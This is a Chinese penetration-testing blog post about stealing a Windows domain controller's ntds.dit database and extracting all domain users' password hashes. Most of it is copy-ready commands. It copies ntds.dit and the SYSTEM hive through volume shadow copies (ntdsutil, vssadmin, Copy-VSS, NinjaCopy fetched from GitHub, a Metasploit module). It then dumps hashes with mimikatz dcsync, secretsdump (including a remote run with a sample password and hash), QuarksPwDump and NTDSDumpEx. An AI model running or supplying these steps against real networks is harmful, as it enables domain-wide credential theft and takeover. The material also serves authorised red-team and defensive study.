域之ntds.dit

admin
admin
admin
101095
文章
87
评论
2021年1月7日18:00:50评论151 views字数 2553阅读8分30秒阅读模式
域之ntds.dit
点击上方蓝字 关注我吧


ntds.dit



ntds.dit为ad的数据库(C:WindowsNTDS),内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。

ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsnap工具。



离线获取ntds.dit



vss快照方式

vss即Volume Shadow Copy Service。win2003及以上有,用于创建数据备份的快照功能。


ntdsutil

查看当前快照列表和已经挂载的快照
ntdsutil snapshot "List All" quit quitntdsutil snapshot "List Mounted" quit quit

创建快照
ntdsutil snapshot "activate instance ntds" create quit quit


域之ntds.dit


挂载快照

ntdsutil snapshot "mount 521972bf-3b80-470c-aa9b-f40ee0f9be57" quit quit


域之ntds.dit


复制出来ntds和system

copy C:$SNAP_202009131458_VOLUMEC$windowsNTDSntds.dit c:ntds.ditcopy C:$SNAP_202009131458_VOLUMEC$windowssystem32configSYSTEM c:SYSTEM


域之ntds.dit


卸载和删除快照

ntdsutil snapshot  "unmount {521972bf-3b80-470c-aa9b-f40ee0f9be57}" quit quitntdsutil snapshot  "delete {521972bf-3b80-470c-aa9b-f40ee0f9be57}" quit quit


域之ntds.dit


vssadmin

查看快照

vssadmin list shadows


创建快照

vssadmin create shadow /for=c:


域之ntds.dit


复制出来ntds和system

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowsNTDSntds.dit c:ntds.ditcopy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy3windowssystem32configSYSTEM C:SYSTEM


删除快照

vssadmin delete shadows /for=c: /quiet

PS:直接是无法访问?快照中的内容的,需要创建链接才可以:

mklink/dc:vssfile\?GLOBALROOTDeviceHarddiskVolumeShadowCopy3


nishang:copy-vss.ps1

nishang的Copy-VSS.ps1可进行快捷的
开启ps执行脚本权限:

Set-ExecutionPolicy Unrestricted


copy到当前目录:

Copy-VSS


msf:psexec_ntdsgrab

msf模块psexec_ntdsgrab可利用vss导出,再离线破解。
admin/smb/psexec_ntdsgrab

NinjaCopy方式

在powersploit中提供了不调用vss的方式ninjacopy。ps文件下载地址:
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1
开启ps执行脚本权限:
Set-ExecutionPolicy Unrestricted


导入ps模块并导出ntds:

Import-Module .invoke-NinjaCopy.ps1Invoke-NinjaCopy -Path C:WindowsSystem32configSYSTEM -LocalDestination C:\systemInvoke-NinjaCopy -Path "C:windowsntdsntds.dit" -LocalDestination "C:\ntds.dit"


域之ntds.dit




ntds.dit中提取hash



mimikatz

在服务器直接mimikatz即可,就不用上面的离线导出ntds.dit了,有杀毒软件等情况还是需要离线导出。
lsadump::dcsync /domain:fox.com /all /csv

secretsdump.py

Impacket包中的py:
secretsdump.py -ntds ./ntds.dit -system ./SYSTEM LOCAL

域之ntds.dit


得到域管用户密码或hash情况下,可远程连接导出:
secretsdump.py fox/admintests:QWEqwe123@172.16.58.147或者secretsdump.py fox/admintests@172.16.58.147 -hashes aad3b435b51404eeaad3b435b51404ee:621cdf4b49c06ec28caa7a6cab4ebac8

域之ntds.dit


QuarksPwDump.exe

先使用windows自带的esentutl修复下ntds.dit文件:
esentutl /p /o ntds.dit

再使用QuarksPwDump.exe进行提取

.QuarksPwDump.exe --dump-hash-domain --output userhash.txt --ntds-file .ntds.dit


域之ntds.dit


NTDSDumpEx

相当windows的secretsdump,下载地址:https://github.com/zcgonvh/NTDSDumpEx
.NTDSDumpEx.exe -d ntds.dit -s SYSTEM


域之ntds.dit


PS:搭建域环境时候随便敲的域名为fox.com,与其他无关。

域之ntds.dit
域之ntds.dit
域之ntds.dit

域之ntds.dit
点分享
域之ntds.dit
点点赞
域之ntds.dit
点在看

本文始发于微信公众号(SecIN技术平台):原创 | 域之ntds.dit

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月7日18:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   域之ntds.dithttps://cn-sec.com/archives/167302.html

发表评论

匿名网友 填写信息